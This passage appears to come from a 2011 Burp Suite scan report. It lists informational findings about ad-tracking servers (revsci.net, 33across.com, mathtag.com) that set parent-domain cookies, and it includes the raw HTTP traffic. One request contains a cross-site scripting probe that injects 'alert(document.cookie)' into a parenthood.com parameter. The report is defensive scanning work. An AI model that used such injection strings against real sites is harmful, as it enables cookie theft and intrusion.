Set-Cookie: udm_0=MLv39VEJKTpn5l6pUNmEWEzMKG45IuEqmBBIfYaUcjeAzuFye+b+KeIZ8tkF3tzTHZ2QnYDrsm8yZEEzQFSlsKuzpFsHJLRmUyNDZGs8wuB7MAYu0WhRql1pFlfdsk0PXv+O8oosstifQ51JPmgHotLWbzVAPUbgeOrkkO3PFrbz4SeQbTrMV1NVyr5r6M8chD02fm3i43pRp1PeI1joJCvmEjHJvn0VFB7vMlWKUsKCVQEP1ZSDsp6oUx57p/nHilXryR9sIPzTsNBUe9eDiBNIYeW+9mECa7M0AjD/Vcz/FnfBt1uOQs2nd+VgcUjnEtuUTfLTvObBcum6WRUbq3oSTGslWvh8JnPTpcb7HQLFtVHEGxjlbI6E8H7KOXctvSU8aAzGUT8RGP0NkftE0oKUTX6Ui5Qk6Hl1aF0840g0DVtmiCpVXnw2+x2wuxwFCh8P1D1qjY2mQfBrSO3ePpH3parBpg8oM4qmDnEEwDanIYsSZegYX4VDOt3SFH1yL8FJSyY3HD6e6GKgaaK9iKgSKCkH5jDhRvXVY+j6iw6+dfp7omioseS6Z03w+GlD0SA+kV5vdt6YJLDpwF04J8zTGDjcVAfhAPgg9zQcY17KDpvKauirxygcT/lZl9NRozklUQk1WvkAfMTZ8eAeU8Y5MHekFBLTY7fsiJiEjya/c9hNv6Jn225zZhDtOWzpvf7pLFR1F3ddCJj+ZLMLCNt2qoiAPtqk3Z2R4TwWOePPMO7t9IW6e5UImrhwl4PObVEr2IHVrmPaPoySb80MJACtSku+nyikHCrJuoa0Onh466k3SaP5pgJj5AN3qQ//qWmAHi6+34jfmmzdq18AmlqUa6Niv6278fTccmM8uni84fSQiSYcLeNq8Us8kQaFNbnoDorAmwCoYryNvncBB/EG++N9eqSyJOLrV+tsIkRyCeSM1oQQXbgCZjLrspisqylDj5c5Rxno4Y2x+Sa2S09kKAD7ph+eqIEKz5wnNvi0WnewN3qmc450pXtZA8Sl439MXUt2iLvyn8j7kYB/8cMNbJQ8xWI=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:23:40 GMT

GIF89a.............!.......,...........D..;

13.136. http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07610/b3/0/3/1003161/657607877.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /G07610/b3/0/3/1003161/657607877.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.parenthood.com%252F%253Fd1907'-alert(document.cookie)-'807a8eb3eff%253D1%2526bpid%253DS024%2525204%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F57%26DM_EOM%3D1&C=G07610 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; rsi_us_1000000=pUMd5E+jOAQU7cSkflzeOejf3/ePLz0Psl9qa9zTZ1t6AFynnGN/w2Ipu/wD9QEZclz9FP70Ci3JyeIahZkuXSk0ZtPgX7SFR+DpJQJmZ1vt6IWJuFzbdAIsD16/jT6ASHhy7bMFslLHKeJ4tPxwosYFSAh7XO2qEXKRtA7w5uA5avP9SQDAyg9vXqfo+p88pxe7bY7NGaMBYEjLpAPuVA8NrWMRMs6zd5NORzFDEpHgdM+SmvL5mgc8HvoJe5SJKkbyQ6UOa8YjmPtXy/73vxxd21+SGbzVCMzGPXkvgOJfP5MtgB0puzKLJNbts3At8IarRgu+tapU6Ux1NksnWXnFEHHXenEKOFxTe77WzfHDzv4ktUNcOrx2EHyaG2AoIg4/VXFSuiwTRpvqKyKHnGr/SuGys5aGQEmneqNKfAatpxhIUrEMbXrFSH1acXksX7U2PC5OWTV13bRHdHhb0HTalP9QAeJOrTEjAwL1nwbaQcRBIsAbIJZLRQa9FBlZRsP6aaCzCMDKGbZqir9rlWa30OAzgHB+RRHmP8mfcgjD+rNWI3pyATyYEHBXNWMS6gDnLyXx5pSQhXZJl7xVx3a6RWAV7Vb2ra2zha7EDq5MmWgk2tTFNoY+NcxtAcq4xrm3wIB4Ql4lEMgTuAjMaTbOcYOTIo2oE4Rh8f5J09aacOc39BDnwAYLLIMRadrYuR2SKYEW/xeQd7pIb/OV+Aj2hiJ2VyNAc4AIqT5Y0V6InBy2Tv9GpgfkC8szHcnqQRbdzi8T1UJfoAq/Im3dt4+SkkD79vzAAMzVFYko5bcoQ2jEEs6JEkAzhtfQhi/MUFytF8A6pzEqTYPAw5NT/u1l1UFBZM1GkUNu8lKRa/rn+8H75Y4XcvdPIjqNvKn4ogpFZx4A8pHOl4OGqf3aimsFVTtcfxSFxFYTKQoVuhto/+sqVCd6CyavvSadPnkBST5mX4SZT/MWJFf7Q6+gceiV2A==; udm_0=MLv39VEJKSpv594MC+h4JSwIkXqgYHMmyC3xYCeyCGUJt6bsIndhJEjJwdqucoUZrgWCmxyU0OJlQ213w21JPmM/iDJlITl3EEFzngB2QtFc0Xl9U/Gg3PagTLMo3o+hwr2WlZ6YG0ReovbWWOGbKwkxB8k2WUjgEE0/nS2wlrbz4SeYx6w7iQUYu+7iRB+ZkIwg3nRrpGl6f6V7A4+jE5lFU02hSv4Dc+7C4SbhWK2btovuT99PG9kRbKR4uGz7mngMO6lV1V2qeLLybr2pkltIYWzeU2CSZ/Np7jsMFstEqzggt8q7xijoefvXgj34E9tszfFjcONJpkNdSmuiKcvP8yZR6GDqwvcFczCslxYpArJcTEEljhOdn26rcepxbj3ztDcefDmtvZC9ynKoJ7G3tS4SmoGqviDkSGvnK9Wvul+D++lbyAc8ttiE15n9rrgo78Mlpfx6tV0UNRfYJx1T04JOxz+3KHxRdVLD8RIxGVWf+HQnGh0fSiH7t6IFohD1y5mC7utj0tZGphNePvNPCkAjhcShrI/rZNIAjbsW9AhiWohf2Bdagg0zrh3s8tnuAI2cA9oxwOF5+jbDUCM4eu/YexI+LP/69jTg7lPKDpsKYeiqxSgMT/1ZnycNKeT7AQl1YSuwAt/18KYCUyiFOwSxOEUPMeDv+ro5+s2YrN4YRm5XcW9t5RwAbBmY6ISFsQkwBVC1w2zqeokHqrWKPsmTioHVbv2dXyUcemAdKyD0eXur5j86czqg3xmGkah4P5wGCIjwWRgY0/iMMz3fX0cOMe62Zy5ySYpf+OUu2RSTsCilKmxQPIb037DRqxhI/nM3/kMiU0g8BQIHKlIGr4wJuNxD8kqznxGYFcZQyQr9M4DmGg6oQQOnfKJ0mSpKzCKbvJrtg5JqjdTKM1cwjOiKnXjZ4O/Uo0Lx5CLnF4QrNqrMyL8fhJ6biE1yQSM38Rl2E3lt6yE8erh9T0D0mTvA/DUbSTGfmaC295aKSZtombrxSg==

Response

13.137. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv8iEJPj5n5t4Lxl8gqM+1+kVoa5JUtjw8RivzoP+6DdtaaJZxHI3717ZFmK2ZlsyUeOuq1XEViaeooyTfZUM3DFRjLhZPKW5XYmxNuO+4+rYyDseF5YobgFQCn2cS7aRvMTMvoplsJb6dvG7t3PCR6Rou8l75exTjbBjgseL+XAqHsouMbHMryYHF1wxXZE50wIytk8Q3eKmmpA0exyO99w7z20ofCv9JlxWMNHyralUwaaBqnHaNcF8NLXsy9AB+zs+UcyCKXdEjj3O1C6WOtNb3pH3/jow9FynWUeWw7QSn0aSkoenRcQhxCe63j6D1DByzYPmvyTIGtMnbOmjDploVPBPbrLNCKcbesh+PrRvMnSVXdy05AL22vNX0q4JCOba0b9bOGV8NtCTL9L3/TUIPkLc+apBjqNighdFBh36gkaxuC1c/An57s+87tT5f8png7zjrKl9PcTk3l4Y5RLgIy3GmWmLXFI93zstHlqsJgWd5QlwPCdT76camu9cemH/XJhelupJXy/sB5OGGoHHObI87INpeX0bS1gX3MOhN2NKt5hwZF/B8uoP85q7F0xxRf3ipYj4GZGV7k1/y4mq698jVyTdCsDE0i9Y7Q66bh3+Z4MfhR6lSoSmVAKVIUiWWW4G3/wTqrejoUQCYoQKd4VwE/i4ToD9z5SSr4tny7VPLcN0fTcmjjYo377nxMIFMKDCkOo0XGMGHpNIudWENyCdQ0DrCiXIGV9nuUw8Q3qmUsYwDn/aRc4ciHT0ANjzZVwN53mjStBIjn/S2XdwK13xeoP8pXNfmKCYFrf8pU+0/Yn7gtaIl0ujBFU2ORgQQ2P/Jaf/WlLPAqyPBvwp/X9958EnXYBM2+sm/tx7X2Czc168Jw9LTEmh/A3Gw0ZpetH5orwSKrfqcnwOV1sbSoQxyd1GbYRlqFXI=; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 22:48:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

13.138. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.autobytel.com%252Fx22%253FChannel%253D%2526Make%253D%2526Category%253D%2526Site%253DAutobytel.com%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F31%26DM_EOM%3D1&C=K04491 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=

Response

13.139. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=141&cgn=13888&seg=6770 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295482376917

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 01:35:46 GMT
Server: 33X6
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Location: http://segment-pixel.invitemedia.com/pixel?partnerID=38&key=segment&code=6770&random=303331
Content-Length: 0
Set-Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

13.140. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=1524&mt_adid=221 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1295637719; uuid=4d3702bc-839e-0690-5370-3c19a9561295

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-n1a pid 0x12c2 4802
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 25 Jan 2011 01:35:47 GMT
Etag: 4d3702bc-839e-0690-5370-3c19a9561295
Connection: Keep-Alive
Set-Cookie: ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
